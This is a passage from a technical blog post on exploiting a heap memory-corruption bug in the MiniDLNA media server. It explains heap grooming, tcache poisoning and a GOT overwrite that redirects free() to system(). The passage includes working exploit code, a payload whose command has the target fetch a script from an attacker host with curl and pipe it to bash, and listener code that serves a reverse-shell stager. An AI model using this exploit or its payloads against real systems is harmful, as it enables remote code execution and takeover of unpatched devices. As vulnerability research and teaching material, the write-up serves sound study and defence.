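    for prev, cur in zip(reversed(addrs[:-1]), reversed(addrs[1:])):
        if cur - prev != chunk_size:
            break
        run.insert(0, prev)
    return run


# Made-up sample log; real addresses will differ.
log = """
============== Allocation for req_buf is at 0x4b2f10
============== Allocation for req_buf is at 0x4b3a40
============== Allocation for req_buf is at 0x4b3aa0
============== Allocation for req_buf is at 0x4b3b00
"""

tail = sequential_tail(req_buf_addrs(log), 0x60)
print([hex(addr) for addr in tail])
</code></pre></div></div>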

<h3 id="separating-the-connection-and-request-buffer-allocations">separating the connection and request buffer allocations</h3>

<p>Because the fields of the <code class="language-plaintext highlighter-rouge">upnphttp</code> structure are accessed throughout the code that handles
request processing, it would be ideal to separate those allocations from the request buffer
allocations so that the latter end up allocated sequentially, rather than having the <code class="language-plaintext highlighter-rouge">upnphttp</code>
structures sandwiched between them. This can be accomplished by initiating the connections that
will be needed <em>before</em> sending any data on the sockets — the <code class="language-plaintext highlighter-rouge">upnphttp</code> structures are allocated
when the connection is received (in <code class="language-plaintext highlighter-rouge">New_upnphttp()</code>, called by <code class="language-plaintext highlighter-rouge">ProcessListen()</code> upon receiving
a new connection) and will remain allocated as long as the connection is kept open, which allows
us to send data asynchronously from when the connections are initiated.</p>

<h3 id="the-ol-switcheroo---getting-the-corruption-request-inserted-at-the-top-of-the-crafted-heap">the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap</h3>

<p>Taking another look at the ideal heap layout described above, here is what needs to be done
to construct it using the techniques and information described so far:</p>

<ul>
  <li>Allocate the connection <code class="language-plaintext highlighter-rouge">upnphttp</code> structs that will be needed before sending any request data</li>
  <li>Send request data on <code class="language-plaintext highlighter-rouge">x</code> of the allocated connections to reach the point where request buffer
allocations start happening sequentially. The real ‘crafted heap’ starts here.</li>
  <li>Send the request data for the request that will trigger the corruption (‘top’ of the crafted
heap, at lower address)</li>
  <li>Send request data to create another request buffer allocation of the same size as the previous
one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.</li>
  <li>Send the request containing the payload data that will be written to the target (‘bottom’ of the
crafted heap, at higher address)</li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x2000
---
	.....................
	...corrupt_buffer.... &lt;-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. &lt;-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... &lt;-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600
</code></pre></div></div>

<p>As can be seen, the request that is used to trigger the corruption must be sent <em>before</em> allocating
the other buffers to have it allocated at a lower address relative to the others. This is a bit of
an issue because sending the actual corruption payload first would either trigger a crash prematurely
at worst (preventing anything else from being done) or get processed and result in the buffer
being <code class="language-plaintext highlighter-rouge">free()</code>’d at best. After spending some time learning about the Glibc <code class="language-plaintext highlighter-rouge">malloc</code> implementation
and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation
in the place where the corruption buffer would need to be; that allocation then gets <code class="language-plaintext highlighter-rouge">free()</code>’d
immediately before sending the actual corruption request, after the crafted heap has been set up.
By making this placeholder allocation the same size as the corruption request allocation (rounded
up to the actual <code class="language-plaintext highlighter-rouge">malloc</code> chunk size), making an allocation of that size immediately after it’s
<code class="language-plaintext highlighter-rouge">free()</code>’d results in the same chunk being returned by <code class="language-plaintext highlighter-rouge">malloc()</code> due to its “first fit” design.
This means that sending the actual corruption request after dropping the connection for the
placeholder buffer (causing it to be <code class="language-plaintext highlighter-rouge">free()</code>’d) will result in the data for the corruption payload
being allocated where we need it.</p>
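<p>The placeholder swap can be illustrated with a toy model. The class below is <em>not</em> Glibc’s
allocator, just a single-size free list that hands back the most recently freed chunk first, which
is the only behavior the trick relies on. The addresses and the <code class="language-plaintext highlighter-rouge">0x60</code> chunk size are
arbitrary.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>class ToyBin:
    """Toy single-size allocator with a LIFO free list; not glibc."""

    def __init__(self, heap_start, chunk_size):
        self.next_fresh = heap_start
        self.chunk_size = chunk_size
        self.free_list = []

    def malloc(self):
        if self.free_list:
            return self.free_list.pop()   # most recently freed chunk first
        addr = self.next_fresh
        self.next_fresh += self.chunk_size
        return addr

    def free(self, addr):
        self.free_list.append(addr)


heap = ToyBin(heap_start=0x2000, chunk_size=0x60)
placeholder = heap.malloc()   # 'top' of the crafted heap
target = heap.malloc()        # 'middle'
payload = heap.malloc()       # 'bottom'

heap.free(placeholder)        # drop the placeholder connection
corrupt = heap.malloc()       # corruption request of the same size
print(hex(corrupt), corrupt == placeholder)   # 0x2000 True
</code></pre></div></div>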

<h3 id="putting-it-all-together">putting it all together</h3>

<p>Having figured out everything covered in the previous sections, we now have everything we need to
write an exploit. Before going into the meaty details, let’s take a moment to review. We can now:</p>

<ul>
  <li>Control when allocations (i.e. <code class="language-plaintext highlighter-rouge">malloc</code> calls) are made and control their size</li>
  <li>Control when allocations are <code class="language-plaintext highlighter-rouge">free()</code>’d so we can keep buffers in place while we make other allocations</li>
  <li>Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory</li>
  <li>Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation</li>
</ul>

<h2 id="exploit-arbitrary-rw-via-tcache-poisoning-for-rce">Exploit: Arbitrary R/W via Tcache Poisoning for RCE</h2>

<p>Whew! That was a lot of background to cover but hopefully that will all help with making sense of
the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll
avoid going into specifics like sizes and addresses since those are variable and not critical for
understanding how the exploit works. The source code for the exploits has been heavily commented if
you’re interested in more details.</p>

<p>The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer
to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the
Global Offset Table (GOT) and overwrite the entries for <code class="language-plaintext highlighter-rouge">free()</code> and <code class="language-plaintext highlighter-rouge">fprintf()</code> to point to
<code class="language-plaintext highlighter-rouge">system()</code>. <code class="language-plaintext highlighter-rouge">free()</code> is targeted as it will be called for <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> at the end of request handling,
transforming the call from <code class="language-plaintext highlighter-rouge">free(h-&gt;req_buf)</code> to <code class="language-plaintext highlighter-rouge">system(h-&gt;req_buf)</code>. The payload sent for the final
allocation where the GOT is corrupted begins with a shell command that will download and execute a
script from an attacker-controlled server and spawn a reverse shell.</p>

<h3 id="setup-building-the-target">setup: building the target</h3>

<p>The exploit is written for a binary with only partial RELRO and no PIE; the address of <code class="language-plaintext highlighter-rouge">system()</code>
in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM
using Glibc 2.31 (default version installed by OS).</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># install deps</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev <span class="se">\</span>
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
<span class="nb">cd </span>minidlna-git <span class="o">&amp;&amp;</span> git checkout tags/v1_3_2
./autogen.sh
./configure <span class="nt">--enable-tivo</span> <span class="nv">CC</span><span class="o">=</span>clang <span class="nv">CFLAGS</span><span class="o">=</span><span class="s2">"-g -O0 -fstack-protector"</span>
make minidlnad <span class="nv">CC</span><span class="o">=</span>clang <span class="nv">CFLAGS</span><span class="o">=</span><span class="s2">"-g -O0 -fstack-protector"</span>
</code></pre></div></div>

<p>This is the output of the <code class="language-plaintext highlighter-rouge">checksec</code> tool for the output binary:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-&gt; % checksec ./minidlnad
[*] '/home/hyper/minidlna-1.3.2/minidlnad'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
</code></pre></div></div>

<p>The server can be started using the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo ./minidlnad -R -f minidlna.conf -d
</code></pre></div></div>

<h3 id="tcache-poisoning-tldr">tcache poisoning tl;dr</h3>

<p>I’ll assume you have some background on heap exploit techniques, so I won’t go super in-depth here, but
if not, I highly recommend the <a href="https://github.com/shellphish/how2heap">how2heap</a> series on GitHub.
It covers basically every known technique and has up-to-date examples for the latest Glibc
versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional
constraints and checks that will need to be bypassed.</p>

<p>At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation
and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into
returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and
inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the
tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free
chunks in both directions, it only keeps a singly-linked list using the <code class="language-plaintext highlighter-rouge">fd</code> fields of the
<code class="language-plaintext highlighter-rouge">free()</code>’d chunks to keep track of them. By corrupting the <code class="language-plaintext highlighter-rouge">fd</code> pointer of a free’d chunk in a
tcache bin for a given size, a later call to <code class="language-plaintext highlighter-rouge">malloc()</code> for that size (once the corrupted chunk
itself has been handed back out) will result in the allocator returning the address stored in <code class="language-plaintext highlighter-rouge">fd</code>.</p>
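<p>The mechanics can be sketched with a toy model of a single tcache bin. This is a simplification
written for this explanation, not Glibc code: it models only the singly-linked list and none of the
checks, and both the chunk addresses and the <code class="language-plaintext highlighter-rouge">0x41a000</code> target are placeholders.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>class ToyTcache:
    """Toy model of one tcache bin (no safe-linking, no sanity checks)."""

    def __init__(self):
        self.head = None   # address of the first free chunk, or None
        self.fd = {}       # models the fd field stored inside each free chunk

    def free(self, addr):
        self.fd[addr] = self.head   # new chunk points at the old head
        self.head = addr

    def malloc(self):
        addr = self.head
        self.head = self.fd.get(addr)   # blindly trusts whatever fd holds
        return addr


tbin = ToyTcache()
tbin.free(0x2060)
tbin.free(0x2000)

tbin.fd[0x2000] = 0x41a000   # the corruption: overwrite fd of a free chunk

first = tbin.malloc()        # the corrupted chunk itself
second = tbin.malloc()       # whatever address fd was pointed at
print(hex(first), hex(second))   # 0x2000 0x41a000
</code></pre></div></div>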

<h3 id="constructing-the-fake-chunk-for-poisoning">constructing the fake chunk for poisoning</h3>

<p>Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s
already been free’d and this chunk needs to be located after the request buffer containing the
payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so
we control its contents and can place the payload data we want written to the target location (the
<code class="language-plaintext highlighter-rouge">fd</code> pointer) within it. One important thing to note is that because we free the chunk before
corrupting it, the first 16 bytes of the data we send will be overwritten by <code class="language-plaintext highlighter-rouge">free()</code> to store the
<code class="language-plaintext highlighter-rouge">fd</code> and <code class="language-plaintext highlighter-rouge">bk</code> pointers (though technically only the <code class="language-plaintext highlighter-rouge">fd</code> pointer is actually used by tcache), so the
payload data sent is placed at +16-byte offset into the buffer to avoid it being corrupted before
we copy it over the target location.</p>

<p>The illustration below shows how this chunk would look before and after being free’d, with
<code class="language-plaintext highlighter-rouge">return_addr</code> at the right offset to ensure it’s left intact.</p>

<p><img src="/assets/images/chonked-images/fake-chunk-1.png" alt="fake-chunk-1.png" /></p>

<h3 id="heap-preparation">heap preparation</h3>

<p>The first step taken is to use the techniques described earlier in the post to set the heap up so
that we can get allocations created sequentially and spray the fake chunks described in the
previous section into those allocations to use them later.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># * the socks at the end of this list should all be right next to each other
</span>    <span class="c1"># * we'll free these LIFO from the tail to ensure our next allocs for the corruption 
</span>    <span class="c1">#   will come from those sequential chunks. we need at least 2-3 sequential chunks so we use
</span>    <span class="c1">#   a total of 10 allocations here
</span>
    <span class="c1"># create and connect needed sockets before sending any data on any of them. This should
</span>    <span class="c1"># keep the allocations for the upnphttp structs separate from the request buffer allocations.
</span>    <span class="n">GROOMING_ALLOCS</span> <span class="o">=</span> <span class="mi">10</span>
    <span class="nf">xpr</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">starting heap grooming round, using </span><span class="si">{</span><span class="n">GROOMING_ALLOCS</span><span class="si">}</span><span class="s"> allocs...</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">dummies</span> <span class="o">=</span> <span class="nf">create_sockets</span><span class="p">(</span><span class="n">GROOMING_ALLOCS</span><span class="p">)</span>
    <span class="nf">connect_sockets</span><span class="p">(</span><span class="n">dummies</span><span class="p">,</span> <span class="n">server_ip</span><span class="p">,</span> <span class="n">server_port</span><span class="p">)</span>

    <span class="c1"># This is the target address we want malloc to return after the chunk has been corrupted
</span>    <span class="n">where</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">pack</span><span class="p">(</span><span class="n">target_addr</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span>

    <span class="c1"># create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
</span>    <span class="c1"># (fd, bk)
</span>    <span class="n">pre_pad</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x11</span><span class="sh">"</span> <span class="o">*</span> <span class="mi">16</span> <span class="c1"># \x11 is arbitrary
</span>    <span class="n">core</span> <span class="o">=</span> <span class="n">pre_pad</span> <span class="o">+</span> <span class="n">where</span>

    <span class="c1"># pad the end of the paylaod with enough bytes to meet the size needed for the target tcache bin
</span>    <span class="c1"># allocations need to be kept the same size because tcache bins must match exact sizes
</span>    <span class="n">payload</span> <span class="o">=</span> <span class="nf">pad</span><span class="p">(</span><span class="n">ALLOC_SIZE</span><span class="p">,</span> <span class="n">core</span><span class="p">)</span>

    <span class="c1"># send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
</span>    <span class="c1"># the last 3-4 will be allocated sequentially.
</span>    <span class="nf">sendsocks</span><span class="p">(</span><span class="n">dummies</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

    <span class="c1"># free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
</span>    <span class="c1"># so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
</span>    <span class="c1"># both the upnphttp structs and the request buffers they contain.
</span>    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
    <span class="n">dummies</span><span class="p">.</span><span class="nf">pop</span><span class="p">().</span><span class="nf">close</span><span class="p">()</span>
</code></pre></div></div>

<p>After this code runs and the last few allocations are dropped, those free’d chunks should look
something like this in memory and should be in the tcache bin for the matching size (0x60):</p>

<p><img src="/assets/images/chonked-images/fake-chunk-2.png" alt="fake-chunk-2.png" /></p>

<h3 id="poisoning-the-freed-chunk">poisoning the free’d chunk</h3>

<p>Immediately after setting up the heap, the exploit then initiates a connection for the request
that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to
trigger the corruption is padded to match the size of the chunks we just free’d in the previous
step so when the allocation is made, <code class="language-plaintext highlighter-rouge">malloc()</code> will return the last chunk that was inserted into
the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted
into the corresponding tcache bin will be the top chunk shown in the illustration above (at the
lower addresses), so that’s the chunk we’ll get back.</p>
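
<p>The last-in, first-out behavior described above can be sketched with a toy model. This is only an illustration of the ordering, not glibc code: the <code class="language-plaintext highlighter-rouge">TcacheBin</code> class and the chunk addresses are made up for the example.</p>

```python
# Toy model of a single tcache bin: a LIFO stack of free chunk addresses.
# The class and the addresses are hypothetical; only the ordering matters.

class TcacheBin:
    def __init__(self):
        self.entries = []          # most recently freed chunk is last

    def free(self, addr):
        self.entries.append(addr)  # push onto the head of the bin

    def malloc(self):
        return self.entries.pop()  # pop from the head of the bin


# Four sequential 0x60-byte chunks, lowest address first (made-up values).
chunks = [0x1000, 0x1060, 0x10C0, 0x1120]

tbin = TcacheBin()
# Closing the sockets newest-first frees the highest address first.
for addr in reversed(chunks):
    tbin.free(addr)

first_alloc = tbin.malloc()
print(hex(first_alloc))  # the lowest-address chunk was freed last, so it comes back first
```

<p>Freeing in reverse order is what makes the chunk at the lowest address the head of the bin, which places the corruption request directly before the remaining free’d chunks.</p>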

<p>Assuming everything is set up correctly, the chunk for the corruption request and the target chunk
will then look like this (the buffer containing the corruption payload highlighted in green). As
can be seen, things are now set up in such a way that we should be able to use the OOB read to
read past the end of the buffer containing the corruption payload and into the free’d chunk
immediately after it. The free’d chunks still contain the return address payload we want to have
written over the <code class="language-plaintext highlighter-rouge">fd</code> pointer of the same chunk, so we should be able to reach <code class="language-plaintext highlighter-rouge">return_addr</code> with
the call to <code class="language-plaintext highlighter-rouge">memmove()</code> since we have full control over the <code class="language-plaintext highlighter-rouge">len</code> argument.</p>

<p><img src="/assets/images/chonked-images/fake-chunk-3.png" alt="fake-chunk-3.png" /></p>

<p>The write portion of the <code class="language-plaintext highlighter-rouge">memmove()</code> will then “slide” the selected region of bytes “up” (based on
the illustration above) so that <code class="language-plaintext highlighter-rouge">return_addr</code> ends up overwriting <code class="language-plaintext highlighter-rouge">fd</code> 40 bytes below it. To
accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace
characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the
desired location as described in the <strong>“controlling the shift distance”</strong> section earlier in the
post. Once this request has been processed, it will get free’d and inserted back into the same
tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this
(note that the <code class="language-plaintext highlighter-rouge">size, prev_size, etc</code> values shown at the end of the corruption buf are from the
chunk below it, showing where those values end up after the call to <code class="language-plaintext highlighter-rouge">memmove()</code>):</p>

<p><img src="/assets/images/chonked-images/fake-chunk-4.png" alt="fake-chunk-4.png" /></p>
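
<p>A rough simulation of that slide is shown below, using a <code class="language-plaintext highlighter-rouge">bytearray</code> as a stand-in for the heap. The buffer size, the filler bytes, and the target pointer are assumptions chosen for the example, and chunk headers are left out to keep the layout readable; only the 40-byte shift comes from the text.</p>

```python
SHIFT = 40       # shift distance, set by the whitespace before the chunk size
BUF_LEN = 48     # hypothetical size of the corruption request's data


def memmove(buf, dst, src, length):
    """Overlap-safe copy inside one bytearray, like C's memmove()."""
    buf[dst:dst + length] = bytes(buf[src:src + length])


return_addr = (0x404040).to_bytes(8, "little")   # made-up target pointer

heap = bytearray()
heap += b"A" * BUF_LEN          # corruption request buffer
fd_off = len(heap)              # offset of fd in the neighbouring free'd chunk
heap += b"F" * 8                # original fd value
heap += b"." * (SHIFT - 8)      # rest of the free'd chunk up to return_addr
heap += return_addr             # leftover bytes from the heap setup step

# The copied region starts at fd and is long enough to include return_addr;
# the destination sits SHIFT bytes earlier, so everything slides toward
# lower addresses by SHIFT bytes.
src = fd_off
length = SHIFT + 8
memmove(heap, src - SHIFT, src, length)

corrupted_fd = bytes(heap[fd_off:fd_off + 8])
print(corrupted_fd == return_addr)
```

<p>The same arithmetic applies to the real layout: the distance between <code class="language-plaintext highlighter-rouge">return_addr</code> and <code class="language-plaintext highlighter-rouge">fd</code> has to equal the shift distance, otherwise the pointer lands next to <code class="language-plaintext highlighter-rouge">fd</code> rather than on it.</p>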

<p>To get the tainted chunk (the middle one in the illustration) returned to us, we first need to
make at least one allocation of the same size to pop the chunk sitting ahead of it off the bin. Once
the tainted chunk itself has been handed out, the next allocation of that size will have
<code class="language-plaintext highlighter-rouge">malloc()</code> return the pointer we wrote to <code class="language-plaintext highlighter-rouge">fd</code> back to us. In the case of the
exploit, this will be the address of the Global Offset Table (GOT).</p>
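
<p>The allocation sequence can be modeled with a small singly linked free list. This is a simplified sketch, not glibc’s implementation: <code class="language-plaintext highlighter-rouge">ToyTcache</code> and every address in it are hypothetical, and it ignores the pointer mangling (safe-linking) that glibc 2.32 and later apply to <code class="language-plaintext highlighter-rouge">fd</code>.</p>

```python
class ToyTcache:
    """Singly linked free list: head -> chunk -> chunk -> ... -> None."""

    def __init__(self):
        self.head = None     # address of the first free chunk in the bin
        self.fd = {}         # chunk address -> address of the next free chunk

    def free(self, addr):
        self.fd[addr] = self.head
        self.head = addr

    def malloc(self):
        addr = self.head
        self.head = self.fd.get(addr)   # fd is followed without validation
        return addr


GOT_ADDR = 0x605000                              # made-up target address
CORRUPT_BUF, TAINTED, OTHER = 0x1000, 0x1060, 0x10C0

tc = ToyTcache()
tc.free(OTHER)
tc.free(TAINTED)
tc.fd[TAINTED] = GOT_ADDR    # stands in for the memmove() overwrite of fd
tc.free(CORRUPT_BUF)         # the corruption request is freed afterwards

allocs = [tc.malloc() for _ in range(3)]
print([hex(a) for a in allocs])
```

<p>In this model the first allocation returns the corruption buffer, the second returns the tainted chunk, and the third returns the planted pointer.</p>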

<h3 id="corrupting-the-got">corrupting the GOT</h3>

<p>After successfully tricking <code class="language-plaintext highlighter-rouge">malloc()</code> into returning a pointer to the GOT, the next step is to
corrupt one (or more) of the entries contained within to achieve code execution. The most
straightforward way to do this is to call <code class="language-plaintext highlighter-rouge">system()</code> and pass it a pointer to some data we
control containing a string with the command we want to execute. Since we have full control over
the content that’s written, the question is then to figure out <em>which</em> function(s) to corrupt.
Because <code class="language-plaintext highlighter-rouge">system()</code> expects a single argument that’s a pointer to some string data, the function(s)
we target must also take a char (or void) pointer for its first argument and that pointer has to
point to data we control. Finally, the target function(s) need to be called at some point after
we’ve corrupted the GOT but <em>before</em> any other GOT entries that we’ve corrupted are referenced,
since this will almost certainly result in a crash.</p>

<p>Taking all of this into consideration, I eventually found the two functions that would be targeted:
<code class="language-plaintext highlighter-rouge">fprintf()</code> and <code class="language-plaintext highlighter-rouge">free()</code>. The actual entry that produces the code execution is <code class="language-plaintext highlighter-rouge">free()</code> but because
the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial
writes into the request buffer, successfully corrupting <code class="language-plaintext highlighter-rouge">free()</code> also results in corrupting other
GOT entries, including the one for <code class="language-plaintext highlighter-rouge">fprintf()</code>, so it needs to point to a valid function since it’s
called at least once before the next call to <code class="language-plaintext highlighter-rouge">free()</code>. Corrupting <code class="language-plaintext highlighter-rouge">free()</code> is a logical option since
it meets all of the requirements without any additional setup: it takes a single pointer argument
and will be called and passed the pointer to our request buffer almost immediately after we corrupt
the GOT, reducing the risk of other functions that have been corrupted being called and crashing
the application prematurely. <strong><em>As a bonus, hijacking <code class="language-plaintext highlighter-rouge">free()</code> also helps us avoid triggering the
sanity checks in Glibc that would trigger an <code class="language-plaintext highlighter-rouge">abort()</code> after we’ve corrupted the heap metadata.</em></strong></p>

<p>Because <code class="language-plaintext highlighter-rouge">free()</code> (i.e. <code class="language-plaintext highlighter-rouge">system()</code> after the GOT is corrupted) will be called on the pointer to the
GOT where we’re writing the fake entries to, we can insert the command string we want passed to
<code class="language-plaintext highlighter-rouge">system()</code> right at the start of the buffer to have it executed. The code below shows the
construction of the final payload containing the command to run and the fake GOT entries with the
padding needed for the binary the exploit was written for (<code class="language-plaintext highlighter-rouge">free()</code> at GOT+0x40, <code class="language-plaintext highlighter-rouge">fprintf()</code> at
GOT+0x50):</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># set up the command string that will be passed to system()
</span>    <span class="n">staging_server_addr</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lhost</span><span class="si">}</span><span class="s">:</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="si">}</span><span class="sh">"</span>
    <span class="c1"># command: e.g. `curl 192.168.1.8:8080/x|bash`
</span>    <span class="n">command_str</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">curl </span><span class="si">{</span><span class="n">staging_server_addr</span><span class="si">}</span><span class="s">/x|bash</span><span class="sh">"</span><span class="p">.</span><span class="nf">encode</span><span class="p">()</span>
    <span class="n">command_padding</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span>

    <span class="c1"># final cmd string max len is 64, if less than, pad it out
</span>    <span class="n">OFFSET_TO_FREE</span> <span class="o">=</span> <span class="mi">64</span>
    <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">command_str</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">OFFSET_TO_FREE</span><span class="p">:</span>
        <span class="n">command_padding</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">"</span><span class="se">\x00</span><span class="sh">"</span> <span class="o">*</span> <span class="p">(</span><span class="n">OFFSET_TO_FREE</span> <span class="o">-</span> <span class="nf">len</span><span class="p">(</span><span class="n">command_str</span><span class="p">))</span>
    <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">command_str</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">OFFSET_TO_FREE</span><span class="p">:</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">command string too long using provided args, offsets will fail. bailing...</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">command</span> <span class="o">=</span> <span class="n">command_str</span> <span class="o">+</span> <span class="n">command_padding</span>

    <span class="c1"># set up fake GOT table for the overwrite (note: this will need to be updated for binaries that have different offsets between the two)
</span>    <span class="n">got_table</span> <span class="o">=</span> <span class="sa">b</span><span class="sh">""</span>
    <span class="n">got_table</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">p64</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">system_addr</span><span class="p">)</span> <span class="c1"># free() entry
</span>    <span class="n">got_table</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">)</span> <span class="c1"># pad
</span>    <span class="n">got_table</span> <span class="o">+=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">p64</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">system_addr</span><span class="p">)</span> <span class="c1"># fprintf() entry
</span>
    <span class="n">final_payload</span> <span class="o">=</span> <span class="n">command</span> <span class="o">+</span> <span class="n">got_table</span>
</code></pre></div></div>

<p>After the final payload above has been sent and the GOT has been corrupted, the next call to
<code class="language-plaintext highlighter-rouge">free()</code> will actually be a call to <code class="language-plaintext highlighter-rouge">system()</code> and it will be passed the pointer where we just
wrote the payload.</p>
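
<p>As a sanity check on the layout, here is a standalone sketch of the same payload built with only the standard library. The <code class="language-plaintext highlighter-rouge">build_payload()</code> helper and the <code class="language-plaintext highlighter-rouge">system()</code> address are assumptions for illustration; the 0x40 and 0x50 offsets are the ones given above. One deliberate difference from the exploit code: this version rejects a command of exactly 64 bytes, since that would leave no NUL terminator between the command string and the first pointer.</p>

```python
OFFSET_TO_FREE = 0x40      # free() entry, relative to the pointer malloc() returned
OFFSET_TO_FPRINTF = 0x50   # fprintf() entry


def build_payload(command, system_addr):
    # Keep room for at least one NUL so the command string ends before
    # the pointer bytes that follow it.
    if len(command) >= OFFSET_TO_FREE:
        raise ValueError("command must be shorter than 64 bytes")
    entry = system_addr.to_bytes(8, "little")
    payload = command.ljust(OFFSET_TO_FREE, b"\x00")
    payload += entry                         # free() slot
    payload += (0).to_bytes(8, "little")     # slot in between, zeroed as in the exploit
    payload += entry                         # fprintf() slot
    return payload


# Made-up address; the real one depends on the target's libc mapping.
payload = build_payload(b"curl 192.168.1.8:8080/x|bash", 0x7FFFF7E50D60)
print(len(payload), payload[OFFSET_TO_FREE:OFFSET_TO_FREE + 8].hex())
```

<p>For a binary with different GOT offsets, only the two constants and the padding slot between the entries should need to change.</p>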

<h3 id="reverse-shell-stager-and-listener">reverse shell stager and listener</h3>

<p>The command string passed to <code class="language-plaintext highlighter-rouge">system()</code> will download a script from an attacker-controlled server
using <code class="language-plaintext highlighter-rouge">curl</code> and pipe the contents of the script to <code class="language-plaintext highlighter-rouge">bash</code>. The exploit sets up an HTTP listener
to handle the incoming request and responds with a small script to initiate a reverse shell back to
the attacker-controlled server. After responding to that request, it creates the listener for the
reverse shell and waits for the connection.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1"># handle the http request to serve script to spawn reverse shell
</span>    <span class="n">l</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="nf">wait_for_connection</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">x</span><span class="p">.</span><span class="nf">connected</span><span class="p">():</span>
        <span class="n">l</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="n">resp</span><span class="p">.</span><span class="nf">encode</span><span class="p">()</span> <span class="o">+</span> <span class="n">reverse_shell_cmd</span><span class="p">.</span><span class="nf">encode</span><span class="p">())</span>
        <span class="n">l</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="nf">xerr</span><span class="p">(</span><span class="sh">"</span><span class="s">=ERROR=: Timed out waiting for staging connection, exploit likely failed</span><span class="sh">"</span><span class="p">)</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure curl is available on target</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

